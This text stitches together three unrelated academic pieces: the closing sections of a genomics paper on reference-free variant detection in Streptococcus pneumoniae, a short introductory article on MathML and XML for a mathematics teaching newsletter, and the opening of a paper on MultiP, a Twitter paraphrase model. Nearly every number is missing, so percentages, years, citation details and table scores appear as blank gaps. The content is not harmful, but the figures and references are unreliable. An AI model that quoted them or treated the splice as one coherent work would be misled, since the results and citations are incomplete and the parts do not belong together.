dataset. each point repre- sents a sample and the colours denotes the cluster assignment determined by k-means clustering. the sim- ilar pattern of samples in each plot indicates that the same population structure signal is detected by the two variant detection methods. table correlation coefficients for first cca components, estimated using -fold cross-validation on massachusetts data. component correlation coefficient (± % ci) . ± . . ± . . ± . . ± . . ± . ). we found the first three components explain all the variance ( %), with the first component alone explaining %. therefore, both mapping-based snps and kl variants are largely capturing the same variance on the massachusetts data. analysis of contexts to further elucidate the type of variants that are being discovered by our method, we aligned the significant contexts from the massachusetts dataset to the s. pneumoniae reference. of the contexts, less than % failed to align, % aligned in a single location, and the remainder aligned in two or more locations. one context aligned in different locations in the reference genome. further investigation revealed the context corresponds to a boxb repeat sequence. such repeats have previously been used to identify population structure of s. pneumoniae isolates carrying the f serotype, supporting our population structure findings (rakov, ubukata & robinson, ). 
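an illustrative sketch of the population-structure comparison above (the authors' tooling is not specified; scikit-learn is assumed here for the pca and k-means steps): project a samples-by-variants binary matrix onto its first two principal components, cluster the scores into five groups, then reuse the same cluster assignment to colour the scores obtained from a second variant set.

```python
import numpy as np
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans

def pca_clusters(genotypes, n_clusters=5, seed=0):
    # genotypes: (n_samples, n_variants) matrix of binary calls
    # (major allele = 1, other alleles = 0, as in the text above)
    scores = PCA(n_components=2).fit_transform(np.asarray(genotypes, dtype=float))
    clusters = KMeans(n_clusters=n_clusters, n_init=10, random_state=seed).fit_predict(scores)
    return scores, clusters

# e.g. cluster on mapping-based snp calls, then plot the kl-variant scores coloured
# by the same cluster labels to check whether the two feature sets agree:
# snp_scores, groups = pca_clusters(snp_matrix)
# kl_scores, _ = pca_clusters(kl_matrix)
```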
this suggests the variants may be tagging more complex structural elements than just single nucleotide variants. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusions we presented a novel reference-free variant detection method for next-generation sequence data. our method has the advantage of no tuning parameters, rapid calling of known variants on new samples, and may be suited for targeted genotyping once a known set of variants are obtained. simulation experiments showed the method is relatively robust and has good power and fpr to detect common variants, but for rare variants the power was lower and a high depth and number of samples were required to reliably detect them. in a typical genomic prediction setting the method was able to predict heritable phenotypes on both a bacterial dataset (anti-microbial resistance) and on a mouse dataset (coat-colour). on the s. pneumoniae datasets, our method was shown to have similar performance to a standard alignment-based snp calling pipeline, with its requirements for a suitable reference genome. moreover, the method was shown to capture the same population structure on the massachusetts streptococcus bacterial datasets as an alignment- based variant calling approach. these results show our method is capable of capturing important genomic features without a known reference. as with other reference-free variant calling methods, interpretation of the detected variants is more difficult compared to a mapping-based approach as called variants are reported without positional information. one approach to obtain such annotations is to map the variant and its context back to a given reference. given that most sequences with a length greater than bp that exist in a given bacterial reference will have a unique mapping, many variants could be easily mapped back. however, such information is unlikely to exist for variants that do not occur in the reference, or may be misleading for variants that arise through complicated procedures such as horizontal gene transfer. alternatively, variants and their context could be examined via blast searches to determine whether these sequences correspond to previously identified genes or other genomic features. in our experiments we used a combination of these approaches to investigate some of the variants found on the bacterial dataset. we identified contexts that mapped to numerous locations in the reference genome and then used blast to identify the likely origin of the sequence. through this method, variants associated with boxb repeat sequence were found, suggesting our method is capturing variance associated with complex structures. we envisage that the method proposed here could be used to conduct a rapid initial analysis of a given dataset, such as species identification, outbreak detection or genomic risk prediction. our method also enables analysis of data without a suitable reference while still avoiding the computationally expensive step of assembly. furthermore, our method scales linearly with the total number of reads, allowing application to large datasets. the statistical framework established in this work is quite general and could be expanded in several ways. while we have examined only single nucleotide variants within this work, insertions and deletions could be explicitly modelled within this framework at the cost of increased computational expense. 
it may also be possible to model other types of variants, such as microsatellites, provided that a suitable representation for them could be found. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements we thank thomas conway and noel faux for helpful discussions. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • justin bedo conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • benjamin goudey performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • jeremy wazny performed the experiments, wrote the paper, reviewed drafts of the paper. • zeyu zhou performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the research in this article did not generate any raw data and all experiments were conducted on publicly available data. the jax mouse exome data is available from http://phenome.jax.org/db/q?rtn=projects/ projdet&reqprojid= . the bacterial isolates are available from the sra. the accessions are available in supplemental information . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references beroukhim r, mermel ch, porter d, wei g, raychaudhuri s, donovan j, barretina j, boehm js, dobson j, urashima m, henry ktm, pinchback rm, ligon ah, cho yj, haery l, greulich h, reich m, winckler w, lawrence ms, weir ba, tanaka ke, chiang dy, bass aj, loo a, hoffman c, prensner j, liefeld t, gao q, yecies d, signoretti s, maher e, kaye fj, sasaki h, tepper je, fletcher ja, tabernero j, baselga j, tsao ms, demichelis f, rubin ma, janne pa, daly mj, nucera c, levine rl, ebert bl, gabriel s, rustgi ak, antonescu cr, ladanyi m, letai a, bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://phenome.jax.org/db/q?rtn=projects/projdet&reqprojid= http://phenome.jax.org/db/q?rtn=projects/projdet&reqprojid= http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. garraway la, loda m, beer dg, true ld, okamoto a, pomeroy sl, singer s, golub tr, lander es, getz g, sellers wr, meyerson m. . the landscape of somatic copy-number alteration across human cancers. nature ( ): – doi . /nature . chewapreecha c, harris sr, croucher nj, turner c, marttinen p, cheng l, pessia a, aanensen dm, mather ae, page aj, salter sj, harris d, nosten f, goldblatt d, corander j, parkhill j, turner p, bentley sd. a. dense genomic sampling identifies highways of pneumococcal recombination. nature genetics ( ): – doi . /ng. . chewapreecha c, marttinen p, croucher nj, salter sj, harris sr, mather ae, hanage wp, goldblatt d, nosten fh, turner c, turner p, bentley sd, parkhill j. b. comprehensive identification of single nucleotide polymorphisms associated with beta-lactam resistance within pneumococcal mosaic genes. plos genetics ( ):e doi . /journal.pgen. . 
croucher nj, finkelstein ja, pelton si, mitchell pk, lee gm, parkhill j, bentley sd, hanage wp, lipsitch m. . population genomics of post-vaccine changes in pneumococcal epidemiology. nature genetics ( ): – doi . /ng. . fairfield h, gilbert gj, barter m, corrigan rr, curtain m, ding y, d’ascenzo m, gerhardt dj, he c, huang w, richmond t, rowe l, probst fj, bergstrom de, murray sa, bult c, richardson j, kile bt, gut i, hager j, sigurdsson s, mauceli e, di palma f, lindblad-toh k, cunningham ml, cox tc, justice mj, spector ms, lowe sw, albert t, donahue l, jeddeloh j, shendure j, reinholdt lg. . mutation discovery in mice by whole exome sequencing. genome biology ( ):r doi . /gb- - - -r . hastie t, tibshirani r, friedman j. . the elements of statistical learning: data mining, inference, and prediction, second edition (springer series in statistics). nd edition. . corr. th printing. new york: springer-verlag. iqbal z, caccamo m, turner i, flicek p, mcvean g. . de novo assembly and geno- typing of variants using colored de bruijn graphs. nature genetics ( ): – doi . /ng. . kamary k, mengersen k, robert cp, rousseau j. . testing hypotheses via a mixture estimation model. arxiv preprint. arxiv: . . li h. . exploring single-sample snp and indel calling with whole-genome de novo assembly. bioinformatics ( ): – doi . /bioinformatics/bts . ochman h, lawrence jg, groisman ea. . lateral gene transfer and the nature of bacterial innovation. nature ( ): – doi . / . peterlongo p, schnel n, pisanti n, sagot mf, lacroix v. . identifying snps without a reference genome by comparing raw reads. in: string processing and information retrieval. berlin heidelberg: springer, – . price al, zaitlen na, reich d, patterson n. . new approaches to population strati- fication in genome-wide association studies. nature reviews genetics ( ): – doi . /nrg . bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /nature http://dx.doi.org/ . /ng. http://dx.doi.org/ . /ng. http://dx.doi.org/ . /journal.pgen. http://dx.doi.org/ . /ng. http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /ng. http://dx.doi.org/ . /ng. http://arxiv.org/abs/ . http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . / http://dx.doi.org/ . /nrg http://dx.doi.org/ . /nrg http://dx.doi.org/ . /peerj-cs. rakov av, ubukata k, robinson da. . population structure of hyperinvasive serotype f, clonal complex streptococcus pneumoniae revealed by multilocus boxb sequence typing. infection, genetics and evolution ( ): – doi . /j.meegid. . . . schölkopf b, smola aj. . learning with kernels: support vector machines, regular- ization, optimization, and beyond (adaptive computation and machine learning). st. cambridge: mit press. sokal rr, rohlf fj. . biometry: the principles and practices of statistics in biological research. rd edition. new york: w. h. freeman. uricaru r, rizk g, lacroix v, quillery e, plantard o, chikhi r, lemaitre c, peter- longo p. . reference-free detection of isolated snps. nucleic acids research ( ):e –e doi . /nar/gku . wallace cs, boulton dm. . an information measure for classification. the computer journal ( ): – doi . /comjnl/ . . . bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.meegid. . . http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . /peerj-cs. 
mathml / xml series: an introduction
peter james rowlett, nottingham trent university, peter.rowlett@ntu.ac.uk
msor connections nov vol no

the extensible markup language (xml) is changing the way the world works... the word processor used to write this piece is storing the text and style information using xml. the firefox web browser from the mozilla foundation, which is battling for web browser market share with microsoft's internet explorer browser [ ], uses the xml language xul to describe its user interface. with the interface in an open format, firefox is customisable [ ]. you may have heard of the rss feed format (although apparently more people use rss than have heard of it [ ]) or of its audio-based, and lately video-based, equivalent, the podcast. both are xml implementations. you might use xml for satellite navigation [ ] or to modify your favourite computer game [ ]. linguists, concerned that data recorded on endangered languages may become lost, are using xml as a storage method that they can be "sure will be accessible indefinitely into the future" [ ]. they know that by basing their data storage on a free and open standard they can ensure that future tools will be able to access the data stored today. some implementations that may be of particular interest to the msor community are: mathml, used to store mathematics in an unambiguous, machine readable format; and svg and x d, used to create d and d diagrams and animations in a non-proprietary format. these are just a few examples. nasa remarks: "government, industry, and academia are all embracing xml as a technology that will assist in the sharing and reuse of information" [ ]. broadly speaking, xml is a method for describing the structure of data and storing that data. xml is free to use, platform independent, non-proprietary and built on international data encoding standards. this means users with 'non-standard technologies' like linux, firefox, a screenreader or a non-english language can access the data equally. programs can be written to access the data from any platform, and being able to use an xml resource into the future does not depend on any company or organisation's continued existence, as it might with a proprietary format. using the xml implementation mathml, one arrives at a free, open, platform independent, non-proprietary format for describing mathematics notation. your web browser has a language for describing mathematics that your computer algebra system can also speak. mathematics stored as mathml can be unambiguously translated into other formats, such as spoken english or mathematical braille. a search engine can be written which searches mathml webpages for the actual mathematics used, not just for the english text likely to accompany it. while mathml is obviously the xml format of most specific relevance for the msor community, there are plenty of other xml implementations available and upcoming that may be of use. and xml languages are created all the time by individuals to fit a particular need for a particular piece of work. exciting things are certainly possible with mathml and xml. how is the msor community taking advantage of this? this introduction is intended to mark the start of a series of articles within msor connections. upcoming articles will explore the mathml format and other xml formats, and look at the way people are using these.
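as a concrete illustration of the kind of markup being discussed (not taken from the article), the fragment below builds presentation mathml for the expression x^2 + 1 using python's standard xml tooling; the element names (math, mrow, msup, mi, mo, mn) are standard presentation mathml.

```python
import xml.etree.ElementTree as ET

MATHML_NS = "http://www.w3.org/1998/Math/MathML"

math = ET.Element("math", xmlns=MATHML_NS)
row = ET.SubElement(math, "mrow")
power = ET.SubElement(row, "msup")
ET.SubElement(power, "mi").text = "x"   # identifier
ET.SubElement(power, "mn").text = "2"   # exponent
ET.SubElement(row, "mo").text = "+"     # operator
ET.SubElement(row, "mn").text = "1"     # number

# the explicit structure is what makes the mathematics machine readable: the same
# fragment can be rendered in a browser, spoken aloud, translated to braille, or
# passed to a computer algebra system.
print(ET.tostring(math, encoding="unicode"))
```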
this is where your help is needed:
• do you offer your course notes on the web using mathml or another xml format? how do you generate this?
• do you podcast your lectures?
• have a look at the software you use. does it use xml? how might you take advantage of this?
• have you written a program which makes use of xml? does your teaching and learning project store data as xml?
• does your statistical package use xml for data storage?
• do you have an idea for an xml application you'd like to discuss?
• are you screaming at this page for missing an obvious application of xml?
• do you disagree with something written above? have you tried using xml and found it unsuited to your needs? debate is certainly encouraged!
will you share your experiences through msor connections? please contact the editors if you are able to write or contribute to an article for this series.

references
[ ] barker, c. firefox market share on a rollercoaster ride [online]. in: zdnet uk, october . at: http://news.zdnet.co.uk/internet/ , , , .htm [accessed october ].
[ ] hamiter, e. how to create mozilla firefox extensions [online], . at: http://roachfiend.com/archives/ / / /how-to-create-firefox-extensions/ [accessed october ].
[ ] burns, e. more use rss than have heard of it [online]. in: clickz network, october . at: http://www.clickz.com/stats/sectors/search_tools/article.php/ [accessed october ].
[ ] foster, d., ed. gpx: the gps exchange format [online], . at: http://www.topografix.com/gpx.asp [accessed october ].
[ ] callaham, j. civilization iv mod details [online]. game cloud, . at: http://www.gamecloud.com/article.php?article_id= [accessed october ].
[ ] webster, a. digital race to save languages [online]. in: bbc news, march . at: http://news.bbc.co.uk/ /hi/technology/ .stm [accessed october ].
[ ] nasa. nasa xml project [online], . at: http://xml.nasa.gov/ [accessed october ].

remember that the maths, stats & or network maintains a list of mathml resources, at: www.mathstore.ac.uk/mathml/
extracting lexically divergent paraphrases from twitter
wei xu, alan ritter, chris callison-burch, william b. dolan and yangfeng ji
university of pennsylvania, philadelphia, pa, usa {xwe, ccb}@cis.upenn.edu
the ohio state university, columbus, oh, usa ritter. @osu.edu
microsoft research, redmond, wa, usa billdol@microsoft.com
georgia institute of technology, atlanta, ga, usa jiyfeng@gatech.edu

abstract
we present multip (multi-instance learning paraphrase model), a new model suited to identify paraphrases within the short messages on twitter. we jointly model paraphrase relations between word and sentence pairs and assume only sentence-level annotations during learning.
using this principled la- tent variable model alone, we achieve the per- formance competitive with a state-of-the-art method which combines a latent space model with a feature-based supervised classifier. our model also captures lexically divergent para- phrases that differ from yet complement previ- ous methods; combining our model with pre- vious work significantly outperforms the state- of-the-art. in addition, we present a novel an- notation methodology that has allowed us to crowdsource a paraphrase corpus from twit- ter. we make this new dataset available to the research community. introduction paraphrases are alternative linguistic expressions of the same or similar meaning (bhagat and hovy, ). twitter engages millions of users, who nat- urally talk about the same topics simultaneously and frequently convey similar meaning using diverse linguistic expressions. the unique characteristics of this user-generated text presents new challenges and opportunities for paraphrase research (xu et al., b; wang et al., ). for many applications, like automatic summarization, first story detection (petrović et al., ) and search (zanzotto et al., ), it is crucial to resolve redundancy in tweets (e.g. oscar nom’d doc ↔ oscar-nominated docu- mentary). in this paper, we investigate the task of determin- ing whether two tweets are paraphrases. previous work has exploited a pair of shared named entities to locate semantically equivalent patterns from re- lated news articles (shinyama et al., ; sekine, ; zhang and weld, ). but short sentences in twitter do not often mention two named entities (ritter et al., ) and require nontrivial general- ization from named entities to other words. for ex- ample, consider the following two sentences about basketball player brook lopez from twitter: ◦ that boy brook lopez with a deep ◦ brook lopez hit a and i missed it although these sentences do not have many words in common, the identical word “ ” is a strong indicator that the two sentences are paraphrases. we therefore propose a novel joint word-sentence approach, incorporating a multi-instance learning assumption (dietterich et al., ) that two sen- tences under the same topic (we highlight topics in bold) are paraphrases if they contain at least one word pair (we call it an anchor and highlight with underscores; the words in the anchor pair need not be identical) that is indicative of sentential para- phrase. this at-least-one-anchor assumption might be ineffective for long or randomly paired sentences, but holds up better for short sentences that are tem- porally and topically related on twitter. moreover, our model design (see figure ) allows exploitation of arbitrary features and linguistic resources, such as part-of-speech features and a normalization lex- (a) (b) figure : (a) a plate representation of the multip model (b) an example instantiation of multip for the pair of sentences “manti bout to be the next junior seau” and “teo is the little new junior seau”, in which a new american football player manti te’o was being compared to a famous former player junior seau. only out of the total × word pairs, z - z , are shown here. icon, to discriminatively determine word pairs as paraphrastic anchors or not. our graphical model is a major departure from popular surface- or latent- similarity methods (wan et al., ; guo and diab, ; ji and eisenstein, , and others). our approach to extract para- phrases from twitter is general and can be com- bined with various topic detecting solutions. 
as a demonstration, we use twitter’s own trending topic service to collect data and conduct experiments. while having a principled and extensible design, our model alone achieves performance on par with a state-of-the-art ensemble approach that involves both latent semantic modeling and supervised classi- fication. the proposed model also captures radically different paraphrases from previous approaches; a combined system shows significant improvement over the state-of-the-art. this paper makes the following contributions: ) we present a novel latent variable model for paraphrase identification, that specifically ac- commodates the very short context and di- vergent wording in twitter data. we exper- imentally compare several representative ap- proaches and show that our proposed method more information about twitter’s trends: https://support.twitter.com/articles/ -faqs-about-twitter-s-trends yields state-of-the-art results and identifies paraphrases that are complementary to previ- ous methods. ) we develop an efficient crowdsourcing method and construct a twitter paraphrase corpus of about , sentence pairs, as a first common testbed for the development and comparison of paraphrase identification and semantic similar- ity systems. we make this dataset available to the research community. joint word-sentence paraphrase model we present a new latent variable model that jointly captures paraphrase relations between sentence pairs and word pairs. it is very different from previous ap- proaches in that its primary design goal and motiva- tion is targeted towards short, lexically diverse text on the social web. . at-least-one-anchor assumption much previous work on paraphrase identification has been developed and evaluated on a specific benchmark dataset, the microsoft research para- phrase corpus (dolan et al., ), which is de- the dataset and code are made available at: semeval- shared task http://alt.qcri.org/semeval / task / and https://github.com/cocoxu/ twitterparaphrase/ corpus examples news ◦ revenue in the first quarter of the year dropped percent from the same period a year earlier. ◦ with the scandal hanging over stewart’s company, revenue in the first quarter of the year dropped percent from the same period a year earlier. (dolan and brockett, ) ◦ the senate select committee on intelligence is preparing a blistering report on prewar intelligence on iraq. ◦ american intelligence leading up to the war on iraq will be criticized by a pow- erful us congressional committee due to report soon, officials said today. ◦ can klay thompson wake up ◦ cmon klay need u to get it going twitter (this work) ◦ ezekiel ansah wearing d glasses wout the lens ◦ wait ezekiel ansah is wearing d movie glasses with the lenses knocked out ◦ marriage equality law passed in rhode island ◦ congrats to rhode island becoming the th state to enact marriage equality table : representative examples from paraphrase corpora. the average sentence length is . words in twitter vs. . in the news corpus. rived from news articles. twitter data is very dif- ferent, as shown in table . we observe that among tweets posted around the same time about the same topic (e.g. a named entity), sentential paraphrases are short and can often be “anchored” by lexical paraphrases. this intuition leads to the at-least-one- anchor assumption we stated in the introduction. the anchor could be a word the two sentences share in common. it also could be a pair of different words. 
for example, the word pair “next ‖ new” in two tweets about a new player manti te’o to a fa- mous former american football player junior seau: ◦ manti bout to be the next junior seau ◦ teo is the little new junior seau further note that not every word pair of similar meaning indicates sentence-level paraphrase. for example, the word “ ”, shared by two sentences about movie “iron man” that refers to the rd se- quel of the movie, is not a paraphrastic anchor: ◦ iron man was brilliant fun ◦ iron man tonight see what this is like therefore, we use a discriminative model at the word-level to incorporate various features, such as part-of-speech features, to determine how probable a word pair is a paraphrase anchor. . multi-instance learning paraphrase model (multip) the at-least-one-anchor assumption naturally leads to a multi-instance learning problem (dietterich et al., ), where the learner only observes labels on bags of instances (i.e. sentence-level paraphrases in this case) instead of labels on each individual in- stance (i.e. word pair). we formally define an undirected graphical model of multi-instance learning for paraphrase identifica- tion – multip. figure shows the proposed model in plate form and gives an example instantiation. the model has two layers, which allows joint rea- soning between sentence-level and word-level com- ponents. for each pair of sentences si = (si ,si ), there is an aggregate binary variable yi that represents whether they are paraphrases, and which is observed in the labeled training data. let w(sik) be the set of words in the sentence sik , excluding the topic names. for each word pair wj = (wj ,wj ) ∈ w(si ) × w(si ), there exists a latent variable zj which denotes whether the word pair is a paraphrase anchor. in total there are m = |w(si )|× |w(si )| word pairs, and thus zi = z ,z , ...,zj, ...,zm. our at-least-one-anchor assumption is realized by a deterministic-or function; that is, if there exists at least one j such that zj = , then the sentence pair is a paraphrase. our conditional paraphrase identification model is defined as follows: p(zi,yi|wi;θ) = m∏ j= φ(zj,wj;θ)×σ(zi,yi) = m∏ j= exp(θ ·f(zj,wj))×σ(zi,yi) ( ) where f(zj,wj) is a vector of features extracted for the word pair wj, θ is the parameter vector, and σ is the factor that corresponds to the deterministic-or constraint: σ(zi,yi) =   if yi = true∧∃j : zj = if yi = false∧∀j : zj = otherwise ( ) . learning to learn the parameters of the word-level paraphrase anchor classifier, θ, we maximize likelihood over the sentence-level annotations in our paraphrase corpus: θ∗ = arg max θ p(y|w;θ) = arg max θ ∏ i ∑ zi p(zi,yi|wi;θ) ( ) an iterative gradient-ascent approach is used to estimate θ using perceptron-style additive updates (collins, ; liang et al., ; zettlemoyer and collins, ; hoffmann et al., ). we define an update based on the gradient of the conditional log likelihood using viterbi approximation, as follows: ∂ log p(y|w;θ) ∂θ = ep(z|w,y;θ)( ∑ i f(zi, wi)) − ep(z,y|w;θ)( ∑ i f(zi, wi)) ≈ ∑ i f(z∗i , wi)− ∑ i f(z′i, wi) ( ) where we define the feature sum for each sentence f(zi, wi) = ∑ j f(zj,wj) over all word pairs. these two above expectations are approximated by solving two simple inference problems as maxi- mizations: z∗ = arg max z p(z|w, y;θ) y′, z′ = arg max y,z p(z, y|w;θ) ( ) input: a training set {(si,yi)|i = ...n}, where i is an index corresponding to a particular sentence pair si, and yi is the training label. 
Input: a training set $\{(s_i, y_i) \mid i = 1 \ldots n\}$, where $i$ is an index corresponding to a particular sentence pair $s_i$, and $y_i$ is the training label.
1: initialize the parameter vector $\theta \leftarrow 0$
2: for $i \leftarrow 1$ to $n$ do
3:   extract all possible word pairs $\mathbf{w}_i = w_1, w_2, \ldots, w_m$ and their features from the sentence pair $s_i$
4: end for
5: for $l \leftarrow 1$ to the maximum number of iterations do
6:   for $i \leftarrow 1$ to $n$ do
7:     $(y'_i, \mathbf{z}'_i) \leftarrow \arg\max_{y_i, \mathbf{z}_i} p(\mathbf{z}_i, y_i \mid \mathbf{w}_i; \theta)$
8:     if $y'_i \neq y_i$ then
9:       $\mathbf{z}^{*}_i \leftarrow \arg\max_{\mathbf{z}_i} p(\mathbf{z}_i \mid \mathbf{w}_i, y_i; \theta)$
10:      $\theta \leftarrow \theta + F(\mathbf{z}^{*}_i, \mathbf{w}_i) - F(\mathbf{z}'_i, \mathbf{w}_i)$
11:    end if
12:  end for
13: end for
14: return the model parameters $\theta$
Figure: The MultiP learning algorithm.

Computing both $\mathbf{z}'$ and $\mathbf{z}^{*}$ is rather straightforward under the structure of our model and can be solved in time linear in the number of word pairs. The dependencies between $\mathbf{z}$ and $y$ are defined by the deterministic-OR factors $\sigma(\mathbf{z}_i, y_i)$, which, when satisfied, do not affect the overall probability of the solution, and each sentence pair is independent conditioned on the parameters. For $\mathbf{z}'$, it is sufficient to independently compute the most likely assignment $z'_j$ for each word pair, ignoring the deterministic dependencies; $y'_i$ is then set by aggregating all $z'_j$ through the deterministic-OR operation. Similarly, we can find the exact solution for $\mathbf{z}^{*}$, the most likely assignment that respects the sentence-level training label $y$. For a positive training instance, we simply find its highest-scoring word pair $w_\tau$ according to the word-level classifier, then set $z^{*}_\tau = 1$ and $z^{*}_j = \arg\max_{x \in \{0,1\}} \Phi(x, w_j; \theta)$ for all $j \neq \tau$; for a negative example, we set $\mathbf{z}^{*}_i = \mathbf{0}$. The time complexity of both inference problems for one sentence pair is therefore linear in the number of word pairs $|W(s_{i1})| \times |W(s_{i2})|$.

In practice, we use online learning instead of optimizing the full objective. The detailed learning algorithm is presented in the figure above. Following Hoffmann et al., we use a fixed number of iterations in the experiments.

Feature Design

At the word level, our discriminative model allows the use of arbitrary features similar to those used in monolingual word alignment models (MacCartney et al.; Thadani and McKeown; Yao et al.). Unlike discriminative monolingual word alignment, however, we only use sentence-level training labels instead of word-level alignment annotation. For every word pair, we extract the following features:

String features that indicate whether the two words, their stemmed forms, and their normalized forms are the same, similar, or dissimilar. We used the Morpha stemmer (Minnen et al.; https://github.com/knowitall/morpha), Jaro-Winkler string similarity (Winkler), and the Twitter normalization lexicon by Han et al.

POS features that are based on the part-of-speech tags of the two words in the pair, specifying whether the two words have the same or different POS tags and what the specific tags are. We use the Twitter part-of-speech tagger developed by Derczynski et al. We add new fine-grained tags for variations of the eight words "a", "be", "do", "have", "get", "go", "follow" and "please"; for example, we use a tag HA for the words "have", "has" and "had".

Topical features that relate to the strength of a word's association with the topic. This feature identifies the popular words in each topic, e.g., "rip" in tweets about a celebrity's death. We use the G² log-likelihood-ratio statistic, which has been frequently used in NLP, as a measure of word association (Dunning; Moore). The significance scores are computed separately for each trend and converted to binary features for every word pair, indicating whether the two words are both significant or not. Our topical features are novel and were not used in previous work.
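As an illustration of how such word-pair features can be assembled, the sketch below builds a small set of binary feature names for one word pair. The actual pipeline relies on the Morpha stemmer, Jaro-Winkler similarity, a Twitter normalization lexicon, and a G² significance test; the stand-ins used here (difflib's sequence ratio and a naive suffix stripper) are assumptions made purely to keep the example self-contained, and the 0.8 similarity threshold is likewise illustrative.

from difflib import SequenceMatcher

def naive_stem(word):
    # placeholder stemmer, NOT Morpha; strips a few common suffixes
    for suffix in ("ing", "ed", "es", "s"):
        if word.endswith(suffix) and len(word) > len(suffix) + 2:
            return word[: -len(suffix)]
    return word

def string_bucket(w1, w2):
    # same / similar / dissimilar bucket for a pair of strings
    if w1 == w2:
        return "same"
    sim = SequenceMatcher(None, w1, w2).ratio()
    return "similar" if sim >= 0.8 else "dissimilar"

def word_pair_features(w1, w2, pos1, pos2, topical1, topical2):
    """Return binary feature names for one word pair.

    pos1/pos2 are POS tags; topical1/topical2 are booleans indicating whether
    each word is significantly associated with the topic (e.g., by a G^2 test).
    """
    feats = set()
    # string features on the surface and stemmed forms
    feats.add("str=" + string_bucket(w1, w2))
    feats.add("stem=" + string_bucket(naive_stem(w1), naive_stem(w2)))
    # POS features: same/different tag, plus the specific tag pair
    feats.add("pos_same" if pos1 == pos2 else "pos_diff")
    feats.add("pos=" + pos1 + "|" + pos2)
    # topical feature: are both words significant for this trend?
    feats.add("topical_both" if (topical1 and topical2) else "topical_not_both")
    return feats

In a full system each returned feature name would be mapped to an index in the weight vector theta used by the word-level classifier.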
Following Riedel et al. and Hoffmann et al., we also incorporate conjunction features into our system for better accuracy, namely word+POS, word+topical and word+POS+topical features.

Experiments

Data

It is nontrivial to gather a gold-standard dataset of naturally occurring paraphrases and non-paraphrases efficiently from Twitter, since this requires pairwise comparison of tweets and faces a very large search space. To make this annotation task tractable, we design a novel and efficient crowdsourcing method using Amazon Mechanical Turk. Our entire data collection process is detailed in the corpus construction section below, with several experiments that demonstrate annotation quality and efficiency.

In total, we constructed a Twitter paraphrase corpus of sentence pairs drawn from unique sentences. The training and development set consists of sentence pairs posted between April and May, drawn from a large set of trending topics (excluding hashtags). Our paraphrase model and data collection approach are general and can be combined with various Twitter topic detection solutions (Diao et al.; Ritter et al.). As a demonstration, we use Twitter's own Trends service since it is easily available. Twitter trending topics are determined by an unpublished algorithm, which finds words, phrases and hashtags that have had a sharp increase in popularity, as opposed to overall volume. We use case-insensitive exact matching to locate topic names in the sentences. Each sentence pair was annotated by multiple independent crowdsourcing workers. For the test set, we obtained both crowdsourced and expert labels on sentence pairs from randomly sampled Twitter trending topics between May and June. Our dataset is more realistic and balanced, containing a much higher proportion of non-paraphrases than the benchmark Microsoft paraphrase corpus of news data. As noted by Das and Smith, the lack of natural non-paraphrases in the MSR corpus creates a bias towards certain models.

Baselines

We use four baselines to compare with our proposed approach on the sentential paraphrase identification task. For the first baseline, we choose the supervised logistic regression (LR) baseline used by Das and Smith. It uses simple n-gram overlapping features (also in stemmed form) but shows very competitive performance on the MSR corpus.

[Table: Performance of different paraphrase identification approaches on Twitter data, reporting F1, precision and recall for Random, WTMF (Guo and Diab)*, LR (Das and Smith)**, LexLatent, LexDiscrim (Ji and Eisenstein), MultiP and a human upper bound; the numeric scores are not recoverable in this copy. *An enhanced version that uses additional sentences from Twitter. **A reimplementation of a strong baseline used by Das and Smith.]

The second baseline is a state-of-the-art unsupervised method, weighted textual matrix factorization (WTMF), which was specially developed for short sentences by modeling the semantic space of both the words that are present in and the words that are absent from the sentences (Guo and Diab). The original model was learned from WordNet (Fellbaum), OntoNotes (Hovy et al.), Wiktionary, and the Brown corpus (Francis and Kucera). We enhance the model with additional sentences from Twitter, as suggested by Guo et al.

Ji and Eisenstein presented a state-of-the-art ensemble system, which we call LexDiscrim. It directly combines discriminatively tuned latent features and surface lexical features in an SVM classifier.
Specifically, the latent representation of a pair of sentences $\vec{v}_1$ and $\vec{v}_2$ is converted into a feature vector, $[\vec{v}_1 + \vec{v}_2,\; |\vec{v}_1 - \vec{v}_2|]$, by concatenating the element-wise sum $\vec{v}_1 + \vec{v}_2$ and the element-wise absolute difference $|\vec{v}_1 - \vec{v}_2|$.

We also introduce a new baseline, LexLatent, which is a simplified version of LexDiscrim and easy to reproduce. It uses the same method to combine latent features and surface features, but combines the open-sourced WTMF latent space model and the logistic regression model from above instead (the source code and data for WTMF are available at http://www.cs.columbia.edu/~weiwei/code.html; the parsing feature was removed because it was not helpful on our Twitter dataset). It achieves performance similar to LexDiscrim on our dataset (see the results table).

System Performance

For the evaluation of the different systems, we compute precision-recall curves and report the highest F-measure of any point on the curve, on the test dataset of sentence pairs against the expert labels. The results table shows the performance of the different systems. Our proposed MultiP, a principled latent variable model used alone, achieves results competitive with the state-of-the-art system that combines discriminative training and latent semantics.

We also report the agreement level of the labels derived from non-expert annotations on Mechanical Turk, which can be considered an upper bound for the automatic paraphrase recognition task on this dataset. The annotation quality of our corpus is surprisingly good given that the definition of paraphrase is rather inexact (Bhagat and Hovy); the inter-rater agreement between expert annotators on news data, as reported by Dolan et al., is comparatively low.

To assess the impact of different features on the model's performance, we conduct feature ablation experiments, removing one group of features at a time; the results are shown in the feature ablation table.

